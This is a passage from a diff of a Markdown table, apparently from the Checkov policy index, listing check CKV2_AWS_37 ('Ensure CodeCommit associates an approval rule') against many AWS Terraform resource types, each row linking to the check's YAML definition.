[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1023 | CKV2_AWS_37 | resource | aws_s3_bucket_metric | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1024 | CKV2_AWS_37 | resource | aws_s3_bucket_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1025 | CKV2_AWS_37 | resource | aws_s3_bucket_object | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1026 | CKV2_AWS_37 | resource | aws_s3_bucket_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1027 | CKV2_AWS_37 | resource | aws_s3_bucket_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1028 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1029 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1030 | CKV2_AWS_37 | resource | aws_sagemaker_model | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1031 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1032 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance_lifecycle_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1033 | CKV2_AWS_37 | resource | aws_secretsmanager_secret | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1034 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_rotation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1035 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1036 | CKV2_AWS_37 | resource | aws_security_group | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1037 | CKV2_AWS_37 | resource | aws_security_group_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1038 | CKV2_AWS_37 | resource | aws_securityhub_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1039 | CKV2_AWS_37 | resource | aws_securityhub_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1040 | CKV2_AWS_37 | resource | aws_securityhub_product_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1041 | CKV2_AWS_37 | resource | aws_securityhub_standards_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1042 | CKV2_AWS_37 | resource | aws_service_discovery_http_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1043 | CKV2_AWS_37 | resource | 
aws_service_discovery_private_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1044 | CKV2_AWS_37 | resource | aws_service_discovery_public_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1045 | CKV2_AWS_37 | resource | aws_service_discovery_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1046 | CKV2_AWS_37 | resource | aws_servicecatalog_portfolio | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1047 | CKV2_AWS_37 | resource | aws_servicequotas_service_quota | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1048 | CKV2_AWS_37 | resource | aws_ses_active_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1049 | CKV2_AWS_37 | resource | aws_ses_configuration_set | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1050 | CKV2_AWS_37 | resource | aws_ses_domain_dkim | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1051 | CKV2_AWS_37 | resource | aws_ses_domain_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1052 | CKV2_AWS_37 | resource | aws_ses_domain_identity_verification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1053 | CKV2_AWS_37 | resource | aws_ses_domain_mail_from | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1054 | CKV2_AWS_37 | resource | aws_ses_email_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1055 | CKV2_AWS_37 | resource | aws_ses_event_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1056 | CKV2_AWS_37 | resource | 
aws_ses_identity_notification_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1057 | CKV2_AWS_37 | resource | aws_ses_identity_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1058 | CKV2_AWS_37 | resource | aws_ses_receipt_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1059 | CKV2_AWS_37 | resource | aws_ses_receipt_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1060 | CKV2_AWS_37 | resource | aws_ses_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1061 | CKV2_AWS_37 | resource | aws_ses_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1062 | CKV2_AWS_37 | resource | aws_sfn_activity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1063 | CKV2_AWS_37 | resource | aws_sfn_state_machine | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1064 | CKV2_AWS_37 | resource | aws_shield_protection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1065 | CKV2_AWS_37 | resource | aws_simpledb_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1066 | CKV2_AWS_37 | resource | aws_snapshot_create_volume_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1067 | CKV2_AWS_37 | resource | aws_sns_platform_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1068 | CKV2_AWS_37 | resource | aws_sns_sms_preferences | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1069 | CKV2_AWS_37 | resource | aws_sns_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1070 | CKV2_AWS_37 | resource | aws_sns_topic_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1071 | CKV2_AWS_37 | resource | aws_sns_topic_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1072 | CKV2_AWS_37 | resource | aws_spot_datafeed_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1073 | CKV2_AWS_37 | resource | aws_spot_fleet_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1074 | CKV2_AWS_37 | resource | aws_spot_instance_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1075 | CKV2_AWS_37 | resource | aws_sqs_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1076 | CKV2_AWS_37 | resource | aws_sqs_queue_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1077 | CKV2_AWS_37 | resource | aws_ssm_activation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1078 | CKV2_AWS_37 | resource | aws_ssm_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1079 | CKV2_AWS_37 | resource | aws_ssm_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1080 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1081 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1082 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1083 | CKV2_AWS_37 | resource | aws_ssm_parameter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1084 | CKV2_AWS_37 | resource | aws_ssm_patch_baseline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1085 | CKV2_AWS_37 | resource | aws_ssm_patch_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1086 | CKV2_AWS_37 | resource | aws_ssm_resource_data_sync | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1087 | CKV2_AWS_37 | resource | aws_storagegateway_cache | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1088 | CKV2_AWS_37 | resource | aws_storagegateway_cached_iscsi_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1089 | CKV2_AWS_37 | resource | aws_storagegateway_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1090 | CKV2_AWS_37 | resource | aws_storagegateway_nfs_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1091 | CKV2_AWS_37 | resource | aws_storagegateway_smb_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1092 | CKV2_AWS_37 | resource | aws_storagegateway_upload_buffer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1093 | CKV2_AWS_37 | resource | aws_storagegateway_working_storage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1094 | CKV2_AWS_37 | resource | aws_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1095 | CKV2_AWS_37 | resource | aws_swf_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1096 | CKV2_AWS_37 | resource | aws_transfer_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1097 | CKV2_AWS_37 | resource | aws_transfer_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1098 | CKV2_AWS_37 | resource | aws_transfer_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1099 | CKV2_AWS_37 | resource | aws_volume_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1100 | CKV2_AWS_37 | resource | aws_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1101 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1102 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1103 | CKV2_AWS_37 | resource | aws_vpc_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1104 | CKV2_AWS_37 | resource | aws_vpc_endpoint_connection_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1105 | CKV2_AWS_37 | resource | aws_vpc_endpoint_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1106 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1107 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service_allowed_principal | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1108 | CKV2_AWS_37 | resource | aws_vpc_endpoint_subnet_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1109 | CKV2_AWS_37 | resource | aws_vpc_ipv4_cidr_block_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1110 | CKV2_AWS_37 | resource | aws_vpc_peering_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1111 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1112 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1113 | CKV2_AWS_37 | resource | aws_vpn_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1114 | CKV2_AWS_37 | resource | aws_vpn_connection_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1115 | CKV2_AWS_37 | resource | aws_vpn_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1116 | CKV2_AWS_37 | resource | aws_vpn_gateway_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1117 | CKV2_AWS_37 | resource | aws_vpn_gateway_route_propagation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1118 | CKV2_AWS_37 | resource | aws_waf_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1119 | CKV2_AWS_37 | resource | aws_waf_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1120 | CKV2_AWS_37 | resource | aws_waf_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1121 | CKV2_AWS_37 | resource | aws_waf_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1122 | CKV2_AWS_37 | resource | aws_waf_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1123 | CKV2_AWS_37 | resource | aws_waf_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1124 | CKV2_AWS_37 | resource | aws_waf_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1125 | CKV2_AWS_37 | resource | aws_waf_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
